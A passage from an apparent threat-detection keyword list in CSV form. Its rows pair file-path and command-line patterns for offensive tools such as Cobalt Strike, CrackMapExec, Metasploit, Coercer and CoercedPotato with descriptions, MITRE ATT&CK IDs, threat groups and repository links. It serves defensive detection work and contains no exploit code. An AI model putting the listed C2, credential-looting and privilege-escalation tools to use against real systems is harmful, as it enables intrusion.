designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*/clown-newuser.c*",".{0,1000}\/clown\-newuser\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/cmd/c2.go*",".{0,1000}\/cmd\/c2\.go.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/cmd/hades/*",".{0,1000}\/cmd\/hades\/.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*/cmd/reverst/*",".{0,1000}\/cmd\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*/cmd_executor/*.go*",".{0,1000}\/cmd_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/cmd_log.txt*",".{0,1000}\/cmd_log\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/cmd_stager*",".{0,1000}\/cmd_stager.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CmdLineSpoofer.git*",".{0,1000}\/CmdLineSpoofer\.git.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*/CmdLineSpoofer/*.cs*",".{0,1000}\/CmdLineSpoofer\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*/cmdstager/*",".{0,1000}\/cmdstager\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/cme smb *",".{0,1000}\/cme\ssmb\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/cme winrm *",".{0,1000}\/cme\swinrm\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/cme_adcs_output_*.txt*",".{0,1000}\/cme_adcs_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/cme_shares_output_*",".{0,1000}\/cme_shares_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/cme_spooler_output_*",".{0,1000}\/cme_spooler_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/cmedb",".{0,1000}\/cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/CMLoot.git*",".{0,1000}\/CMLoot\.git.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*/CMLoot.ps1*",".{0,1000}\/CMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*/CMSeek*",".{0,1000}\/CMSeek.{0,1000}","offensive_tool_keyword","CMSeek","CMS Detection and Exploitation suite - Scan WordPress. Joomla. Drupal and 130 other CMSs.","T1553 - T1580 - T1583 - T1584 ","TA0007","N/A","N/A","Web Attacks","https://github.com/Tuhinshubhra/CMSeek","1","0","N/A","N/A","10","2210","501","2024-04-09T13:40:52Z","2018-06-14T00:15:51Z" "*/Cn33liz*",".{0,1000}\/Cn33liz.{0,1000}","offensive_tool_keyword","Github Username","Github username Red teamer @ Outflank. Passionate about networking and cybersecurity. known for exploitation tools dev","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cna/pipetest.cna*",".{0,1000}\/cna\/pipetest\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*/Cneelis*",".{0,1000}\/Cneelis.{0,1000}","offensive_tool_keyword","Github Username","Github username Red teamer @ Outflank.Passionate about networking and cybersecurity. known for exploitation tools dev","N/A","N/A","N/A","N/A","POST Exploitation tools","https://twitter.com/Cneelis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/co2-cewler/*",".{0,1000}\/co2\-cewler\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/co2-core/*",".{0,1000}\/co2\-core\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/co2-laudanum/*",".{0,1000}\/co2\-laudanum\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/co2-sqlmapper/*",".{0,1000}\/co2\-sqlmapper\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/coap-resources.nse*",".{0,1000}\/coap\-resources\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cobaltclip.c*",".{0,1000}\/cobaltclip\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/cobaltclip.o*",".{0,1000}\/cobaltclip\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/Cobalt-Clip/*",".{0,1000}\/Cobalt\-Clip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/cobaltstrike*",".{0,1000}\/cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/cobalt-strike*",".{0,1000}\/cobalt\-strike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/cobaltstrike/c2lint*",".{0,1000}\/cobaltstrike\/c2lint.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*/cobaltstrike-nemesis-connector/*",".{0,1000}\/cobaltstrike\-nemesis\-connector\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/code_exec.ps1*",".{0,1000}\/code_exec\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/CodeBuildLooter.py*",".{0,1000}\/CodeBuildLooter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/CoercedPotato.cpp*",".{0,1000}\/CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*/CoercedPotato.git*",".{0,1000}\/CoercedPotato\.git.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*/CoercedPotatoRDLL.git*",".{0,1000}\/CoercedPotatoRDLL\.git.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*/coercer.egg-info*",".{0,1000}\/coercer\.egg\-info.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*/Coercer.git*",".{0,1000}\/Coercer\.git.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*/Coercer.py*",".{0,1000}\/Coercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*/Coercer/*.py",".{0,1000}\/Coercer\/.{0,1000}\.py","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*/coercer_output_*.txt*",".{0,1000}\/coercer_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/CoffeeLdr.c*",".{0,1000}\/CoffeeLdr\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*/CoffeeLdr/*",".{0,1000}\/CoffeeLdr\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" 